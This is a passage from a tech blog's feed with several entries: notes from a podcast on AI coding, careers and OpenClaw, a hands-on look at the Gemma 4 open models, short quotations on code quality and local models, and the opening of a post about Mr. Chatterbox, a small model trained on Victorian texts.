&lt;h2 id="it-s-tough-for-people-in-the-middle"&gt;It's tough for people in the middle&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1769"&gt;29:29&lt;/a&gt; - So ThoughtWorks, the big IT consultancy, &lt;a href="https://www.thoughtworks.com/insights/articles/reflections-future-software-engineering-retreat"&gt;did an offsite about a month ago&lt;/a&gt;, and they got a whole bunch of engineering VPs in from different companies to talk about this stuff. And one of the interesting theories they came up with is they think this stuff is really good for experienced engineers, like it amplifies their skills. It's really good for new engineers because it solves so many of those onboarding problems. The problem is the people in the middle. If you're mid-career, if you haven't made it to sort of super senior engineer yet, but you're not sort of new either, that's the group which is probably in the most trouble right now.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I mentioned &lt;a href="https://blog.cloudflare.com/cloudflare-1111-intern-program/"&gt;Cloudflare hiring 1,000 interns&lt;/a&gt;, and Shopify too.&lt;/p&gt;
&lt;p&gt;Lenny asked for my advice for people stuck in that middle:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1881"&gt;31:21&lt;/a&gt; - That's a big responsibility you're putting on me there! I think the way forward is to lean into this stuff and figure out how do I help this make me better?&lt;/p&gt;
&lt;p&gt;A lot of people worry about skill atrophy: if the AI is doing it for you, you're not learning anything. I think if you're worried about that, you push back at it. You have to be mindful about how you're applying the technology and think, okay, I've been given this thing that can answer any question and &lt;em&gt;often&lt;/em&gt; gets it right. How can I use this to amplify my own skills, to learn new things, to take on much more ambitious projects? [...]&lt;/p&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1985"&gt;33:05&lt;/a&gt; - Everything is changing so fast right now. The only universal skill is being able to roll with the changes. That's the thing that we all need.&lt;/p&gt;
&lt;p&gt;The term that comes up most in these conversations about how you can be great with AI is &lt;em&gt;agency&lt;/em&gt;. I think agents have no agency at all. I would argue that the one thing AI can never have is agency because it doesn't have human motivations.&lt;/p&gt;
&lt;p&gt;So I'd say that's the thing is to invest in your own agency and invest in how to use this technology to get better at what you do and to do new things.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="it-s-harder-to-evaluate-software"&gt;It's harder to evaluate software&lt;/h2&gt;
&lt;p&gt;The fact that it's so easy to create software with detailed documentation and robust tests means it's harder to figure out what's a credible project.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2267"&gt;37:47&lt;/a&gt; Sometimes I'll have an idea for a piece of software, Python library or whatever, and I can knock it out in like an hour and get to a point where it's got documentation and tests and all of those things, and it looks like the kind of software that previously I'd have spent several weeks on - and I can stick it up on GitHub&lt;/p&gt;
&lt;p&gt;And yet... I don't believe in it. And the reason I don't believe in it is that I got to rush through all of those things... I think the quality is probably good, but I haven't spent enough time with it to feel confident in that quality. Most importantly, I &lt;em&gt;haven't used it yet&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;It turns out when I'm using somebody else's software, the thing I care most about is I want them to have used it for months.&lt;/p&gt;
&lt;p&gt;I've got some very cool software that I built that I've &lt;em&gt;never used&lt;/em&gt;. It was quicker to build it than to actually try and use it!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="the-misconception-that-ai-tools-are-easy"&gt;The misconception that AI tools are easy&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=2491"&gt;41:31&lt;/a&gt; - Everyone's like, oh, it must be easy. It's just a chat bot. It's not easy. That's one of the great misconceptions in AI is that using these tools effectively is easy. It takes a lot of practice and it takes a lot of trying things that didn't work and trying things that did work.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="coding-agents-are-useful-for-security-research-now"&gt;Coding agents are useful for security research now&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1144"&gt;19:04&lt;/a&gt; - In the past sort of three to six months, they've started being credible as security researchers, which is sending shockwaves through the security research industry.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;See Thomas Ptacek: &lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;At the same time, open source projects are being bombarded with junk security reports:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=1205"&gt;20:05&lt;/a&gt; - There are these people who don't know what they're doing, who are asking ChatGPT to find a security hole and then reporting it to the maintainer. And the report looks good. ChatGPT can produce a very well formatted report of a vulnerability. It's a total waste of time. It's not actually verified as being a real problem.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A good example of the right way to do this is &lt;a href="https://blog.mozilla.org/en/firefox/hardening-firefox-anthropic-red-team/"&gt;Anthropic's collaboration with Firefox&lt;/a&gt;, where Anthropic's security team &lt;em&gt;verified&lt;/em&gt; every security problem before passing them to Mozilla.&lt;/p&gt;
&lt;h2 id="openclaw"&gt;OpenClaw&lt;/h2&gt;
&lt;p&gt;Of course we had to talk about OpenClaw! Lenny had his running on a Mac Mini.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=5363"&gt;1:29:23&lt;/a&gt; - OpenClaw demonstrates that people want a personal digital assistant so much that they are willing to not just overlook the security side of things, but also getting the thing running is not easy. You've got to create API keys and tokens and install stuff. It's not trivial to get set up and hundreds of thousands of people got it set up. [...]&lt;/p&gt;
&lt;p&gt;The first line of code for OpenClaw was written on November the 25th. And then in the Super Bowl, there was an ad for AI.com, which was effectively a vaporware white labeled OpenClaw hosting provider. So we went from first line of code in November to Super Bowl ad in what? Three and a half months.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I continue to love Drew Breunig's description of OpenClaw as a digital pet:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A friend of mine said that OpenClaw is basically a Tamagotchi. It's a digital pet and you buy the Mac Mini as an aquarium.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="journalists-are-good-at-dealing-with-unreliable-sources"&gt;Journalists are good at dealing with unreliable sources&lt;/h2&gt;
&lt;p&gt;In talking about my explorations of AI for data journalism through &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=5698"&gt;1:34:58&lt;/a&gt; - You would have thought that AI is a very bad fit for journalism where the whole idea is to find the truth. But the flip side is journalists deal with untrustworthy sources all the time. The art of journalism is you talk to a bunch of people and some of them lie to you and you figure out what's true. So as long as the journalist treats the AI as yet another unreliable source, they're actually better equipped to work with AI than most other professions are.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="the-pelican-benchmark"&gt;The pelican benchmark&lt;/h2&gt;
&lt;p&gt;Obviously we talked about &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;pelicans riding bicycles&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=3370"&gt;56:10&lt;/a&gt; - There appears to be a very strong correlation between how good their drawing of a pelican riding a bicycle is and how good they are at everything else. And nobody can explain to me why that is. [...]&lt;/p&gt;
&lt;p&gt;People kept on asking me, what if labs cheat on the benchmark? And my answer has always been, really, &lt;a href="https://simonwillison.net/2025/Nov/13/training-for-pelicans-riding-bicycles/"&gt;all I want from life is a really good picture of a pelican riding a bicycle&lt;/a&gt;. And if I can trick every AI lab in the world into cheating on benchmarks to get it, then that just achieves my goal.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=3596"&gt;59:56&lt;/a&gt; - I think something people often miss is that this space is inherently funny. The fact that we have these incredibly expensive, power hungry, supposedly the most advanced computers of all time. And if you ask them to draw a pelican on a bicycle, it looks like a five-year-old drew it. That's really funny to me.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="and-finally-some-good-news-about-parrots"&gt;And finally, some good news about parrots&lt;/h2&gt;
&lt;p&gt;Lenny asked if I had anything else I wanted to leave listeners with to wrap up the show, so I went with the best piece of news in the world right now.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=5890"&gt;1:38:10&lt;/a&gt; - There is a rare parrot in New Zealand called the Kākāpō. There are only 250 of these parrots left in the world. They are flightless nocturnal parrots - beautiful green dumpy looking things. And the good news is they're having a fantastic breeding season in 2026,&lt;/p&gt;
&lt;p&gt;They only breed when the Rimu trees in New Zealand have a mass fruiting season, and the Rimu trees haven't done that since 2022 - so there has not been a single baby kākāpō born in four years.&lt;/p&gt;
&lt;p&gt;This year, the Rimu trees are in fruit. The kākāpō are breeding. There have been dozens of new chicks born. It's a really, really good time. It's great news for rare New Zealand parrots and you should look them up because they're delightful.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Everyone should &lt;a href="https://www.youtube.com/live/LDSWtyU6-Lg"&gt;watch the live stream of Rakiura on her nest with two chicks&lt;/a&gt;!&lt;/p&gt;
&lt;h2 id="youtube-chapters"&gt;YouTube chapters&lt;/h2&gt;
&lt;p&gt;Here's the full list of chapters Lenny's team defined for the YouTube video:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA"&gt;00:00&lt;/a&gt;: Introduction to Simon Willison&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=160s"&gt;02:40&lt;/a&gt;: The November 2025 inflection point&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=481s"&gt;08:01&lt;/a&gt;: What's possible now with AI coding&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=642s"&gt;10:42&lt;/a&gt;: Vibe coding vs. agentic engineering&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=837s"&gt;13:57&lt;/a&gt;: The dark-factory pattern&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1241s"&gt;20:41&lt;/a&gt;: Where bottlenecks have shifted&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1416s"&gt;23:36&lt;/a&gt;: Where human brains will continue to be valuable&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1532s"&gt;25:32&lt;/a&gt;: Defending of software engineers&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1752s"&gt;29:12&lt;/a&gt;: Why experienced engineers get better results&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=1848s"&gt;30:48&lt;/a&gt;: Advice for avoiding the permanent underclass&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2032s"&gt;33:52&lt;/a&gt;: Leaning into AI to amplify your skills&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2112s"&gt;35:12&lt;/a&gt;: Why Simon says he's working harder than ever&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2243s"&gt;37:23&lt;/a&gt;: The market for pre-2022 human-written code&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2401s"&gt;40:01&lt;/a&gt;: Prediction: 50% of engineers writing 95% AI code by the end of 2026&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2674s"&gt;44:34&lt;/a&gt;: The impact of cheap code&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=2907s"&gt;48:27&lt;/a&gt;: Simon's AI stack&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=3248s"&gt;54:08&lt;/a&gt;: Using AI for research&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=3312s"&gt;55:12&lt;/a&gt;: The pelican-riding-a-bicycle benchmark&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=3541s"&gt;59:01&lt;/a&gt;: The inherent ridiculousness of AI&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=3652s"&gt;1:00:52&lt;/a&gt;: Hoarding things you know how to do&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=4101s"&gt;1:08:21&lt;/a&gt;: Red/green TDD pattern for better AI code&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=4483s"&gt;1:14:43&lt;/a&gt;: Starting projects with good templates&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=4591s"&gt;1:16:31&lt;/a&gt;: The lethal trifecta and prompt injection&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=4913s"&gt;1:21:53&lt;/a&gt;: Why 97% effectiveness is a failing grade&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5119s"&gt;1:25:19&lt;/a&gt;: The normalization of deviance&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5312s"&gt;1:28:32&lt;/a&gt;: OpenClaw: the security nightmare everyone is looking past&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5662s"&gt;1:34:22&lt;/a&gt;: What's next for Simon&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5807s"&gt;1:36:47&lt;/a&gt;: Zero-deliverable consulting&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=5885s"&gt;1:38:05&lt;/a&gt;: Good news about Kakapo parrots&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/podcast-appearances"&gt;podcast-appearances&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/kakapo"&gt;kakapo&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="podcast-appearances"/><category term="ai"/><category term="llms"/><category term="coding-agents"/><category term="generative-ai"/><category term="kakapo"/><category term="agentic-engineering"/></entry><entry><title>Gemma 4: Byte for byte, the most capable open models</title><link href="https://simonwillison.net/2026/Apr/2/gemma-4/#atom-tag" rel="alternate"/><published>2026-04-02T18:28:54+00:00</published><updated>2026-04-02T18:28:54+00:00</updated><id>https://simonwillison.net/2026/Apr/2/gemma-4/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/"&gt;Gemma 4: Byte for byte, the most capable open models&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts.&lt;/p&gt;
&lt;p&gt;Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now.&lt;/p&gt;
&lt;p&gt;They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I don't entirely understand that, but apparently that's what the "E" in E2B means!&lt;/p&gt;
&lt;p&gt;One particularly exciting feature of these models is that they are multi-modal beyond just images:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Vision and audio&lt;/strong&gt;: All models natively process video and images, supporting variable resolutions, and excelling at visual tasks like OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've not figured out a way to run audio input locally - I don't think that feature is in LM Studio or Ollama yet.&lt;/p&gt;
&lt;p&gt;I tried them out using the GGUFs for &lt;a href="https://lmstudio.ai/models/gemma-4"&gt;LM Studio&lt;/a&gt;. The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out &lt;code&gt;"---\n"&lt;/code&gt; in a loop for every prompt I tried.&lt;/p&gt;
&lt;p&gt;The succession of &lt;a href="https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb"&gt;pelican quality&lt;/a&gt; from 2B to 4B to 26B-A4B is notable:&lt;/p&gt;
&lt;p&gt;E2B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican" src="https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;E4B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it" src="https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;26B-A4B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle" src="https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;(This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after &lt;a href="https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105"&gt;fixing that&lt;/a&gt; I got probably the best pelican I've seen yet from a model that runs on my laptop.)&lt;/p&gt;
&lt;p&gt;Google are providing API access to the two larger Gemma models via their &lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it"&gt;AI Studio&lt;/a&gt;. I added support to &lt;a href="https://github.com/simonw/llm-gemini"&gt;llm-gemini&lt;/a&gt; and then &lt;a href="https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e"&gt;ran a pelican&lt;/a&gt; through the 31B model using that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pretty good, though it is missing the front part of the bicycle frame:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent. " src="https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png" /&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/vision-llms"&gt;vision-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemma"&gt;gemma&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/lm-studio"&gt;lm-studio&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;&lt;/p&gt;



</summary><category term="vision-llms"/><category term="llm"/><category term="llm-reasoning"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="gemma"/><category term="llm-release"/><category term="google"/><category term="generative-ai"/><category term="lm-studio"/><category term="pelican-riding-a-bicycle"/></entry><entry><title>Quoting Soohoon Choi</title><link href="https://simonwillison.net/2026/Apr/1/soohoon-choi/#atom-tag" rel="alternate"/><published>2026-04-01T02:07:16+00:00</published><updated>2026-04-01T02:07:16+00:00</updated><id>https://simonwillison.net/2026/Apr/1/soohoon-choi/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.greptile.com/blog/ai-slopware-future"&gt;&lt;p&gt;I want to argue that AI models will write good code because of economic incentives. Good code is cheaper to generate and maintain. Competition is high between the AI models right now, and the ones that win will help developers ship reliable features fastest, which requires simple, maintainable code. Good code will prevail, not only because we want it to (though we do!), but because economic forces demand it. Markets will not reward slop in coding, in the long-term.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.greptile.com/blog/ai-slopware-future"&gt;Soohoon Choi&lt;/a&gt;, Slop Is Not Necessarily The Future&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/slop"&gt;slop&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="slop"/><category term="ai-assisted-programming"/><category term="generative-ai"/><category term="agentic-engineering"/><category term="ai"/><category term="llms"/></entry><entry><title>Quoting Georgi Gerganov</title><link href="https://simonwillison.net/2026/Mar/30/georgi-gerganov/#atom-tag" rel="alternate"/><published>2026-03-30T21:31:02+00:00</published><updated>2026-03-30T21:31:02+00:00</updated><id>https://simonwillison.net/2026/Mar/30/georgi-gerganov/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://twitter.com/ggerganov/status/2038674698809102599"&gt;&lt;p&gt;Note that the main issues that people currently unknowingly face with local models mostly revolve around the harness and some intricacies around model chat templates and prompt construction. Sometimes there are even pure inference bugs. From typing the task in the client to the actual result, there is a long chain of components that atm are not only fragile - are also developed by different parties. So it's difficult to consolidate the entire stack and you have to keep in mind that what you are currently observing is with very high probability still broken in some subtle way along that chain.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://twitter.com/ggerganov/status/2038674698809102599"&gt;Georgi Gerganov&lt;/a&gt;, explaining why it's hard to find local models that work well with coding agents&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/georgi-gerganov"&gt;georgi-gerganov&lt;/a&gt;&lt;/p&gt;



</summary><category term="coding-agents"/><category term="generative-ai"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="georgi-gerganov"/></entry><entry><title>Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer</title><link href="https://simonwillison.net/2026/Mar/30/mr-chatterbox/#atom-tag" rel="alternate"/><published>2026-03-30T14:28:34+00:00</published><updated>2026-03-30T14:28:34+00:00</updated><id>https://simonwillison.net/2026/Mar/30/mr-chatterbox/#atom-tag</id><summary type="html">
    &lt;p&gt;Trip Venturella released &lt;a href="https://www.estragon.news/mr-chatterbox-or-the-modern-prometheus/"&gt;Mr. Chatterbox&lt;/a&gt;, a language model trained entirely on out-of-copyright text from the British Library. Here's how he describes it in &lt;a href="https://huggingface.co/tventurella/mr_chatterbox_model"&gt;the model card&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Mr. Chatterbox is a language model trained entirely from scratch on a corpus of over 28,000 Victorian-era British texts published between 1837 and 1899, drawn from a dataset made available &lt;a href="https://huggingface.co/datasets/TheBritishLibrary/blbooks"&gt;by the British Library&lt;/a&gt;. The model has absolutely no training inputs from after 1899 — the vocabulary and ideas are formed exclusively from nineteenth-century literature.&lt;/p&gt;
&lt;p&gt;Mr. Chatterbox's training corpus was 28,035 books, with an estimated 2.93 billion input tokens after filtering. The model has roughly 340 million paramaters, roughly the same size as GPT-2-Medium. The difference is, of course, that unlike GPT-2, Mr. Chatterbox is trained entirely on historical data.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Given how hard it is to train a useful LLM without using vast amounts of scraped, unlicensed data I've been dreaming of a model like this for a couple of years now. What would a model trained on out-of-copyright text be like to chat with?&lt;/p&gt;
&lt;p&gt;Thanks to Trip we can now find out for ourselves!&lt;/p&gt;
&lt;p&gt;The model itself is tiny, at least by Large Language Model standards - just &lt;a href="https://huggingface.co/tventurella/mr_chatterbox_model/tree/main"&gt;2.05GB&lt;/a&gt; on disk. You can try it out using Trip's &lt;a href="https://huggingface.co/spaces/tventurella/mr_chatterbox"&gt;HuggingFace Spaces demo&lt;/a&gt;:&lt;/p&gt;
&lt;p style="text-align: center"&gt;&lt;img src="https://static.simonwillison.net/static/2026/chatterbox.jpg" alt="Screenshot of a Victorian-themed chatbot interface titled &amp;quot;🎩 Mr. Chatterbox (Beta)&amp;quot; with subtitle &amp;quot;The Victorian Gentleman Chatbot&amp;quot;. The conversation shows a user asking &amp;quot;How should I behave at dinner?&amp;quot; with the bot replying &amp;quot;My good fellow, one might presume that such trivialities could not engage your attention during an evening's discourse!&amp;quot; The user then asks &amp;quot;What are good topics?&amp;quot; and the bot responds &amp;quot;The most pressing subjects of our society— Indeed, a gentleman must endeavor to engage the conversation with grace and vivacity. Such pursuits serve as vital antidotes against ennui when engaged in agreeable company.&amp;quot; A text input field at the bottom reads &amp;quot;Say hello...&amp;quot; with a send button. The interface uses a dark maroon and cream color scheme." style="max-width: 80%;" /&gt;&lt;/p&gt;
&lt;p&gt;Honestly, it's pretty terrible. Talking with it feels more like chatting with a Markov chain than an LLM - the responses may have a delightfully Victorian flavor to them but it's hard to get a response that usefully answers a question.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://arxiv.org/abs/2203.15556"&gt;2022 Chinchilla paper&lt;/a&gt; suggests a ratio of 20x the parameter count to training tokens. For a 340m model that would suggest around 7 billion tokens, more than twice the British Library corpus used here. The smallest Qwen 3.5 model is 600m parameters and that model family starts to get interesting at 2b - so my hunch is we would need 4x or more the training data to get something that starts to feel like a useful conversational partner.&lt;/p&gt;
&lt;p&gt;But what a fun project!&lt;/p&gt;
&lt;h4 id="running-it-locally-with-llm"&gt;Running it locally with LLM&lt;/h4&gt;
&lt;p&gt;I decided to see if I could run the model on my own machine using my &lt;a href="https://llm.datasette.io/"&gt;LLM&lt;/a&gt; framework.&lt;/p&gt;
&lt;p&gt;I got Claude Code to do most of the work - &lt;a href="https://gisthost.github.io/?7d0f00e152dd80d617b5e501e4ff025b/index.html"&gt;here's the transcript&lt;/a&gt;.&lt;/p&gt;
